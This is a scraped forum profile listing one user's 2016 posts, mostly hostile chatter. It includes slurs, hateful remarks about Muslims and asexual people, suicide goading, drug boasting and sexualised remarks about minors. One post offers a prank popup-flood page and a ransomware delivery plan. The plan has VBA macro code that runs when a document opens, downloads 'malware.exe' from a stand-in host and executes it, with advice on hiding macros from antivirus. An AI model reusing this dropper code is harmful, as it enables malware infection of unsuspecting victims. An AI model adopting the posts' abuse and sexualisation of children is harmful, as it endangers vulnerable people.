Posts by Sophie

2016-04-06 at 6:02 PM UTC in The name's LaBamba

Sophie Pedophile Tech Support

The name's [FONT=sans-serif]Î», and i represent concepts beyond your comprehension.[/FONT]

2016-04-06 at 5:29 PM UTC in The retarded thread: Fuck, §m£ÂgØL made one first edition

Sophie Pedophile Tech Support

Received this message in my inbox. I thought, "How the fuck did they get this number?"

"Hi, my Name's Casey. Call you. I would like to buy a couple of your girlfriends. I live in North Oakland close to Berkeley. Anyway I thought I'd let me know if you didn't want to send them. Thanks "

Turns out he said "gold coins", he sounds Indian. Transcribed, used my Google Voice number for a craigslist ad.

The first time I looked at it I thought it might be Casper offering to buy me a prostitute(s).

Sorry that was me, was meant for my contact in the russian mob. Nice quads too by the way.

dubsguy.jpeg

2016-04-06 at 3:48 PM UTC in Making the case for Islam

Sophie Pedophile Tech Support

Fuck Muslims. Fuck religion. Fuck leftists and fuck you too.

2016-04-05 at 9:14 PM UTC in conversations with my boss

Sophie Pedophile Tech Support

[greentext]>not having seen jerome's tits[/greentext]

smh tbh fam

2016-04-05 at 9:11 PM UTC in Age is just a number...

Sophie Pedophile Tech Support

High school girls are the best âˆ†

Oh, is Dasha Anya high school aged in those pics? i really can't tell but i have the feeling she ain't.

2016-04-05 at 9:07 PM UTC in Asexual people are fucking retarded

Sophie Pedophile Tech Support

Heterosexual
Homosexual/Pedophile
Asexual

I don't think being any of those things is a choice, Sophie. Why do you disagree?

Fine, but it's still not an orientation. Being born without an arm isn't a choice still doesn't make you look less like a cripple.

2016-04-05 at 9:02 PM UTC in WWYD if an 8 year old kid flipped you off?

Sophie Pedophile Tech Support

Laugh and tell the little shithead to fuck off. The fuck you think I'd do? I'm not Sophie.

Gender of the kid wasn't specified and FYI if it was qt little girl i'd laugh as well because tsundere is where it's at.

2016-04-05 at 9 PM UTC in A+ god tier suicide method

Sophie Pedophile Tech Support

Do it faggot.

2016-04-05 at 7:02 PM UTC in Yuki Yuki Yuki

Sophie Pedophile Tech Support

Did senpai at least notice you?

2016-04-04 at 1:02 AM UTC in we got drugz for dayz mayne

Sophie Pedophile Tech Support

is that cocaine and ibuprofen?

Nope it's street grade amphetamines and xtc tabs.

2016-04-03 at 8:45 PM UTC in we got drugz for dayz mayne

Sophie Pedophile Tech Support

That's baby food to me but I applaud you either way.

Thank you, When i was high this thread seemed like a good idea. It has since lost it's appeal. Oh well

2016-04-03 at 12:38 PM UTC in Highschoolers

Sophie Pedophile Tech Support

I wish, but i see my tween cousin on a semi regular basis.

2016-04-03 at 6:32 AM UTC in we got drugz for dayz mayne

Sophie Pedophile Tech Support

2016-04-02 at 5:48 PM UTC in anyone code in asp.net?

Sophie Pedophile Tech Support

It's a server-side script engine for creating dynamically generated web pages.

Oh that's right it's a web app framework. I think supports visual basic and C# as well.

2016-04-02 at 5:36 PM UTC in Asexual people are fucking retarded

Sophie Pedophile Tech Support

I don't think it's a choice, childfucker. See?

Asexuality is not a fucking sexual orientation idiot.

2016-04-02 at 2:30 PM UTC in Asexual people are fucking retarded

Sophie Pedophile Tech Support

Yes they are retarded. Why anyone wouldn't want to have sex is beyond me.

2016-04-02 at 2:03 PM UTC in anyone code in asp.net?

Sophie Pedophile Tech Support

What kind of language is ASP.NET? What sort of applications is it best suited for? Or is it more of a general language.

2016-04-01 at 2:32 PM UTC in Let's talk crypto.

Sophie Pedophile Tech Support


<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script language="JavaScript">
<!--
function ZOKLock()
{
var h=new Array
(

'<!--*******************************************',
' This page protected by Yomoma ZokLock ',
' Copyright (C) Yomoma Software Co. 2001-2002 ',
' http://www.disney.com/ ',
'********************************************-->',

//Page Begin
'6B',
't!3E 35~U42u"(38$664543GG6533;: :39y,39&.?,3E%65j03+;3813;: :39{~U42uk`tMR4543,3837#,!&$m0A39350D;38"+hq454331@S`x:,3E38+.x3C;?(62MR3544',
'@@S3731&-%:w/36-;38"+`65h1A33 1C32*27;q@SMR3E(38m0A39351A,+!0E)360739/#y}x? $)3637v2739/#62MR4543,3837#,!&$m0A39351F $02)%36`3C38!u`36)$/61',
'y!,3C;#/,343D;`GG"MRhi38(-35*&i62#3C37x07+ (:34p61`q@S3DU4244@:30.3C273E64")%36htj1E -0F!27053D3C.634543GGvou65wGG65o++;#3D-~U4244@q*#',
'*!393Em1501160F1C0B0A1C}z02(3C,0A#*!393Eoy130A0Bth3D+/,66#39og|w;*38$)34664543v39303434-w19"y0D39&30j0F+//;,383Ey1337h05#39-,3Dh1D# 3C|w3C 3E!3C~U42',
'u65%3C!3Cv44@q;/3C31i(,:+?:&?#3D}z.3D:wvo3E3D*!(3Dn3027393E"w/*/66,,32%.!;?3Ew*(/kj/3E#37$&38p{63hxyz}i62U423D/35-}zk0F0C0B1F061Eji&',
'$37+65jjy~ov61qkj;35)36#thnjsn~psoy!34!27!p{63n~7F|{o62664543v+363235h$/3931/3Cuk1A020A14zv44@my`xt39j,35)?&th.3C.,-;hs65)36383C3Em-',
'39(-th0F,34,2727hm*)"-th7Fi62x%(32!3C.?3C!wokunji$,34%65j+3E#18.362730hm/!343D,wo1A,31+"j 3Cnv660Em,31%39,kGGy`xh&$.35);#th,35%*',
'3C61m1A31/+h10%38+`1527$27,66gqs44@;3832x+iwmh{U42?+?y,39un1E%3834+h1E38"3727x0F3C/3E*`19/(##y063727%mvTJ.);j37#:xuim1E-35(!-mvTJ/ ',
'&(qsxn.3Evy#qh323C,+`(htj3D+/35383D62j0E(37h 39m-(3Dh.38(38343D;3Dj193634+-($m3C363D:vj0C-343D%393Emzgs+65jj09323D38(38(y&37:i39 30343Do`q@',
'S)3E`39jp64`"32336336:}kx34j@S%34;,j3630&p38iwp35!q33*w~i3Dx-%39(y#x6362373062)3E`39jp64`"3233633638,3D:3D62j`qiqx{thq7F6134j@S%34;,j3630&',
'p38iwpy,396132+!3C32,`n06181A0B01h0F1F0E12140F011Dm64$`U42,&3E3C`#)%/?-h7F01i-383C33+h30%38y,37;,64m1E/37,+33(y.37?gm6462MR3E(38m3003373D273E(+}hs',
'3E"$35%p3C;?(p3731&-%:w/(-2762j3134,38s6562.37/66/+*3E/,66*% ~i%35rh@S`xhi)?383330!27-or);273C$393C32po3E#)-(65jx66%3C)? 3Dw|u323D; 30',
',;,3Du27%jp{310B&?#-%*63626330$66)3D&3Ev{~64g39t@S|w.&38 gMRt66("3D39664543GG6533;: :39y,39&.?,3E%65j03+;3813;: :39{~U42uk`tMR45433D$37',
'$37?g%3D3C.xui193434123D)%1D$370F(-27q@SMRg66g`gMRt6639.+)(3CwGGTJ64g!3E 35~'
);
//Page End

var pw='default';
var t='\00\01\02\03\04\05\06\07\010\t\n\013\014\r\016\017\020\021\022\023\024\025\026\027\030\031\032\033\034\035\036\037\040!\042#$%&\047()*+,-./0123456789:;\074=\076?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\134]^_`abcdefghijklmnopqrstuvwxyz{|}~â‚¬Ââ€šÆ’â€žâ€¦â€ â€¡Ë†â€°Å â€¹Å’ÂÅ½ÂÂâ€˜â€™â€œâ€â€¢â€“â€”Ëœâ„¢Å¡â€ºÅ“ÂÅ¾Å¸*Â¡Â¢Â£Â¤Â¥Â¦Â§Â¨Â©ÂªÂ«Â¬*Â®Â¯Â°Â±Â²Â³Â´ÂµÂ¶Â·Â¸Â¹ÂºÂ»Â¼Â½Â¾Â¿Ã€ÃÃ‚ÃƒÃ„Ã…Ã†Ã‡ÃˆÃ‰ÃŠÃ‹ÃŒÃÃŽÃÃÃ‘Ã’Ã“Ã”Ã•Ã–Ã—Ã˜Ã™ÃšÃ›ÃœÃÃžÃŸÃ Ã¡Ã¢Ã£Ã¤Ã¥Ã¦Ã§Ã¨Ã©ÃªÃ«Ã¬ÃÃ®Ã¯Ã°Ã±Ã²Ã³Ã´ÃµÃ¶Ã·Ã¸Ã¹ÃºÃ»Ã¼Ã½Ã¾Ã¿';

var x='0123456789ABCDEF';
var i,j,xs;
var c=0;

for(i=0;i<pw.length;i++)
c=c^t.indexOf(pw.charAt(i));

if(c!=parseInt(h[5].charAt(0)+h[5].charAt(1),16))
{
}

for(i=0;i<5;i++)
document.writeln(h[i]);

for(i=0;i<40;i++)
document.writeln();

var n=pw.length;
var m=0;
var s='';
for(j=6;j<h.length;j++)
{
for(i=0;i<h[j].length;i++)
{
xs=h[j].charAt(i)
if(x.indexOf(xs)>=0)
{
i++;xs=xs+h[j].charAt(i);c=parseInt(xs,16);
}
else
c=t.indexOf(xs);
c=c^44^t.indexOf(pw.charAt(m));
m++;
if(m==n)
m=0;
if(c==13)
{
document.writeln(s);s='';
}
else if(c==10)
{
;
}
else
s=s+t.charAt(c);
}
}

document.writeln(s);

return true;
}

var ie=0;
if(navigator.appName.indexOf('Microsoft')>=0)
{
ie=1;ZOKLock();
}

function ZOKLock2()
{
if(ie==0)
ZOKLock();
}
// -->

</script></head><body onLoad="ZOKLock2();"></body></html>


<html>
<head>
<script language="JavaScript">
<!-- function SymError() { return true; } window.onerror = SymError; var SymRealWinOpen = window.open; function SymWinOpen(url, name, attributes) { return (new Object()); } window.open = SymWinOpen; //-->
</script>
<script LANGUAGE="JavaScript" SRC="prot.js"></script>
<title>So Many Browsers So Little Time</title>
</head>
<body background="ftp://fucked.hopto.org/fakevirus.jpg" bgcolor="#000000" text="#FFFFFF" link="#336699" vlink="#336699" alink="#666666">
<form method="POST">
<p align="center"><input type="Button" size="20" maxlength="256" name="btnAnnoy" value="Click me...G'ahead" onclick="alert('Whos Your Momma?'); var c = 1; var la='Thats Wrong Guess Again Fool'; var zzz = 'Stupid'; while(3 > c) {var p = prompt('Who is the greatest Totsean ever? Attempt #'+c, 'Prepare for smite'); if(p == zzz){c=30} else {if(p ==la){c=30} else c ++}};if(p == zzz){alert('911911911')} else {if(p == la){alert('LUCKY FUCKTWIT')} else {alert('I guess you lose. Goodbye now.'); var iCounter=0;while(true)window.open('http://www.faggot.com')}};" crashing"+icounter('width="1,height=1,resizable=no');iCounter++)}}""></p>
</form>
</body>
<script language="JavaScript">
<!-- window.open = SymRealWinOpen; //-->
</script>
</html>

Of course you are fee to post what you want. But seeing as i value your expertise and appreciate and respect your opinion in the infosec/programming field i was hoping you'd share your thoughts on crypto and ransomware in general. If you have anything interesting to add i'd love to hear about. Just ignore spectral, he's just a skid trying to look cool.

For delivery of the ransomware i had the folling in mind:

A common vector for the delivery of malware is via Word/Excel macro. Obfuscating/encrypting the source code of your malware itself is obviously very important. Not only for opsec purposes but the longer it takes researchers/AV companies to reverse engineer your malware the longer it will stay effective. If your delivery mechanism is through a downloader embedded in an Office document adding obfuscation and encryption not only protects against reverse engineering but aids in evading AV heuristics as well. To that end i've found a python implementation that not only obfuscates your VBA code but automatically generates an Office document based on a template and inserts your downloader within it. What's more, it's fully customizable. It's features are as follows;

Encrypt all strings present in your VBA code
Encrypt data from your python Script in VBA code (domain names or paths for example)
Randomize each functions' (or variables) names
Choose Encryption method, how and where encryption keys are stored
Generate as many unique MS Office documents as you want using a file name list and a document template
Enable autodestruction of encryption Keys feature once the VBA has been triggered once

As i understand it, the way it works is as follows. The python script reads in a VB script and looks for certain tags within the code. Based on the tags it performs an operation like randomizing a variable or function name, for instance:


Function [rdm::10]Test()          '=> Test() will become randomized with a 10 characters string
[rdm::4]String_1 = "Test"        '=> String_1 wil lbecome randomized with a 4 characters string

Depending on the values you set in config.py a type of encryption is selected among a number of other settings. Here's a screenshot of the script in action.

Pretty cool if you ask me, here's a link to the relevant repo on github. https://github.com/Pepitoh/VBad

Now doing some research into malware deployed in this manner and relevant code examples written in VB Script i kind of tried to nigger rig the following based on code found here.

https://github.com/CloudStrief/xcode...doc/skript.txt


Option Explicit

Public CN As String
Public APD As String
Public UN As String
Public HOSTNAME As String
Public DROPPER_EXE As String
Public PAYLOADS_FOLDER As String
Public PAYLOAD_FILE As String

Function InitMe()
    DROPPER_EXE = "malware.exe"
    HOSTNAME = "http://www.evilhost.com/code"
    PAYLOADS_FOLDER = HOSTNAME & "/payloads/"
    CN = Environ("COMPUTERNAME")
    APD = Environ("TMP")
    UN = Environ("USERNAME")
End Function


Sub Document_Open()
    InitMe
    Dim val As String
    Dim FN As String
    
    PayLoad (APD + DROPPER_EXE)
    Dim oShell
    Set oShell = CreateObject("WScript.Shell")
        
    oShell.Run APD + DROPPER_EXE
    FN = APD
    
    On Error GoTo 0
End Sub

Private Sub writeBytes(file, bytes)
    Dim binaryStream
    Set binaryStream = CreateObject("ADODB.Stream")
    binaryStream.Type = 1
    binaryStream.Open
    binaryStream.Write bytes
    binaryStream.SaveToFile file, 2
End Sub

Function getPayload(val As String, FN As String)
    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
    
    WinHttpReq.Open "GET", PAYLOADS_FOLDER & DROPPER_EXE
    
    WinHttpReq.SetRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    WinHttpReq.SetRequestHeader "Accept", "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
    WinHttpReq.SetRequestHeader "Accept-Language", "en-us,en;q=0.5"
    WinHttpReq.SetRequestHeader "Accept-Charset", "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
    
    WinHttpReq.send
    writeBytes FN, WinHttpReq.ResponseBody
End Function

This is probably full of errors since i don't have a clue about Visual Basic/VBA/VBS so i was wondering if you could help me improve this particular block of code. Interestingly enough the original repo contains all you need including malware itself written in python and everything you need server side to deploy this. If you're interested here's a link to the complete project.

https://github.com/CloudStrief/xcode

2016-04-01 at 4:42 AM UTC in Let's talk crypto.

Sophie Pedophile Tech Support

Aside from all your bluster, you're an off-topic faggit kidiot. You get what you deserve.

Kill yourself, i post more quality content in a week than you do in a year.

2016-04-01 at 4:25 AM UTC in Lanny, your site is cramping my style coding style.

Sophie Pedophile Tech Support

The hell are you talkin bout nigga?

I needed to programatically retrieve the response header of niggasin.space, but urllib2's user agent won't do. I get a 403 forbidden when i try to do so. So i used mechanize to spoof a user-agent and got the response header anyway.

User Controls

Navigation